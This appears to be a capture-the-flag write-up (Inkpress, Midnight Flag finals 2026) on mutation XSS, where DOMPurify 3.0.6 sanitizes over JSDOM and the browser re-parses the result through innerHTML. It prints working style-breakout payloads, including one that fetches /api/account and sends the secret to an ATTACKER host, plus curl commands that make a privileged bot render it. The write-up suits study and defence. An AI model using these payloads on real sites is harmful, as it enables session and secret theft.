Note
Exploit the parser mismatch between server-side DOMPurify/JSDOM sanitization and browser reparsing of the serialized string.
mXSS through DOMPurify + JSDOM Reparse of a "Safe" Tree
DOMPurify only guarantees that the DOM node tree it returns is safe — it does not guarantee that
the string you get back from that tree is safe to feed to an HTML parser again. When sanitization
happens server-side over JSDOM and the resulting string is later dropped into innerHTML in a real
browser, two different HTML engines touch the same bytes: JSDOM serializes, Chromium re-parses. mXSS
lives in that gap.
The trick relies on rawtext elements (style, script, textarea, title, xmp, noscript,
iframe, noframes…). Per the HTML serialization spec, the text content of a rawtext element is
emitted literally, without escaping — a </style> inside a <style> text node comes out as the
raw bytes </style>, not </style>. To JSDOM that is inert character data nested in a node.
To Chromium re-parsing the string, that </style> closes the element early and everything after it
becomes live markup.
Why It Works
"Sanitized HTML string" is not a parser-independent concept. A tree that is provably safe inside JSDOM can re-materialize as active markup once a different parser reads its serialization.
DOMPurify's intended safe usage keeps everything as nodes (
RETURN_DOM_FRAGMENT+replaceChildren) so the string is never re-parsed. The bug appears when the app serializes to a string and re-parses:// SAFE: node never re-parsed const frag = DOMPurify.sanitize(dirty, { RETURN_DOM_FRAGMENT: true }); post.replaceChildren(frag); // VULNERABLE: string is re-parsed by the browser post.innerHTML = DOMPurify.sanitize(dirty);This is forced on you when sanitization is server-side (JSDOM) and insertion is client-side: you cannot ship a live JSDOM node across the wire, only its serialized string.
Vulnerable Pattern
Server sanitizes with DOMPurify over JSDOM and returns the serialized string; the client re-parses it.
From the Inkpress challenge (server.js):
const createDOMPurify = require('dompurify'); // 3.0.6 — pre-3.1 anti-mXSS gate
const { JSDOM } = require('jsdom');
function renderDocument(tree) {
const window = new JSDOM('').window;
const document = window.document;
const DOMPurify = createDOMPurify(window);
const root = document.createElement('article');
for (const node of nodes) root.appendChild(buildNode(document, node, 0));
return DOMPurify.sanitize(root); // returns a STRING (root.innerHTML)
}
// /p/:id page sent to the editor bot — the sanitized string is re-parsed here
const data = ${data}; // { title, html }
document.getElementById('post').innerHTML = data.html; // <-- reparse sink
Crucially the app lets you build the node tree by hand via a JSON tree of
{ tag, attrs, children } blocks (buildNode), so you control the exact node shape DOMPurify sees —
including giving a rawtext element an element child:
function buildNode(document, spec, depth) {
if (typeof spec.text === 'string') return document.createTextNode(spec.text);
const tag = String(spec.tag || '').toLowerCase();
if (!/^[a-z][a-z0-9]*$/.test(tag)) throw new Error('invalid tag name');
const el = document.createElement(tag);
// ...attrs...
if (Array.isArray(spec.children))
for (const child of spec.children) el.appendChild(buildNode(document, child, depth + 1));
return el;
}
The DOMPurify Anti-mXSS Gate (and how to skip it)
DOMPurify ≤ 3.0.x has one defense against exactly this. In _sanitizeElements it force-removes a node
whose children are text only but whose text looks like markup:
// purify.cjs.js (DOMPurify 3.0.6)
if (currentNode.hasChildNodes()
&& !_isNode(currentNode.firstElementChild) // no ELEMENT child
&& regExpTest(/<[/\w]/g, currentNode.innerHTML)
&& regExpTest(/<[/\w]/g, currentNode.textContent)) {
_forceRemove(currentNode); // <style>...</style> killed
}
A <style> whose only child is the breakout text is removed. But the gate is short-circuited the
moment the element has an element child: firstElementChild becomes non-null, so
!_isNode(currentNode.firstElementChild) is false and the whole condition fails. So:
- Give
<style>a harmless surviving element child (<br>) → gate skipped,<style>survives. - Give
<style>a text node carrying</style><img ... onerror=...>. DOMPurify (default config,SAFE_FOR_TEMPLATESunset) never treats text inside a rawtext element as markup, soonerroris never stripped.
This element-child bypass is patched in DOMPurify 3.1+.
Exploit Flow
- Confirm the sink is "sanitize server-side over JSDOM → serialize → browser re-parses via
innerHTML". - Pick a rawtext element you're allowed to emit (
stylehere). - Give it two children: a benign element child to defeat the anti-mXSS gate, and a text child that closes the rawtext element and injects live markup.
- Trigger the page in the victim's browser (here: request an editorial review so the bot opens
/p/:id). - In
onerror, do the real work — exfiltrate the secret the bot can read.
What DOMPurify sees vs. what the browser sees
DOMPurify walks this tree and considers it clean (text is opaque inside style):
article
└─ style
├─ #text "</style><img src=1 onerror=alert(1)>" ← opaque chars to JSDOM
└─ br ← makes firstElementChild non-null
JSDOM serializes the text node literally (rawtext rule), producing:
<article><style></style><img src=1 onerror=alert(1)><br></style></article>
Chromium re-parses that string: the first </style> closes the style early, and <img> becomes a
real, live element — onerror fires.
Final Payload
The JSON tree submitted to /api/posts:
[
{
"tag": "style",
"children": [
{ "text": "</style><img src=1 onerror=alert(1)>" },
{ "tag": "br" }
]
}
]
Weaponized for the challenge — the editor bot carries an httpOnly session cookie and the flag is
served from /api/account ({ role, name, secret: FLAG }). Keep the onerror value space-free so it
stays a single unquoted attribute after reparse:
[
{
"tag": "style",
"children": [
{ "text": "</style><img src=1 onerror=fetch('/api/account').then(r=>r.text()).then(s=>location='https://ATTACKER/?'+encodeURIComponent(s))>" },
{ "tag": "br" }
]
}
]
Then publish and request a review so the bot renders it:
# publish, capture the id
ID=$(curl -s http://TARGET/api/posts -H 'Content-Type: application/json' \
-d '{"title":"x","tree":[{"tag":"style","children":[{"text":"</style><img src=1 onerror=fetch(`/api/account`).then(r=>r.text()).then(s=>location=`https://ATTACKER/?`+encodeURIComponent(s))>"},{"tag":"br"}]}]}' \
| python3 -c 'import sys,json;print(json.load(sys.stdin)["id"])')
# make the editor bot open it (DWELL gives the XSS time to fire)
curl -s http://TARGET/api/review -H 'Content-Type: application/json' -d "{\"id\":\"$ID\"}"
Variations
- Other rawtext elements:
textarea,title,xmp,noscript,iframe,noframes. Same idea — literal serialization of inner text + an element child to dodge the gate. - Comment-boundary mXSS (
<style><!--</style>...) andnoscript/templatequirks are related classes when no element-child gate is in play. - If only attribute values serialize, remember they escape only quotes/
&—<and>survive, sovalue="</style>"-style breakouts apply.
Common Blockers
- DOMPurify 3.1+ closes the
firstElementChildgate; on patched versions look for a different serialization divergence or a different sanitizer entirely. - If both sides use the same engine, or the output is inserted as text (
textContent) rather than re-parsed, there is no gap to exploit. - A space inside an unquoted
onerrorafter reparse splits the attribute — quote it or keep it space-free.
Good Situations To Use It
- Sanitization happens server-side over JSDOM, then the string is re-inserted via
innerHTMLin a browser. - You control the node tree precisely (e.g. a JSON block builder) and rawtext elements are allowed.
- A privileged headless bot opens your content and holds a secret/cookie worth stealing.
Sources
midnight_flag_finals_2026/web/inkpress- DOMPurify internals & mXSS deep dives: https://mizu.re/post/exploring-the-dompurify-library-bypasses-and-fixes
- CVE-2024-47875 (DOMPurify nesting/mXSS class)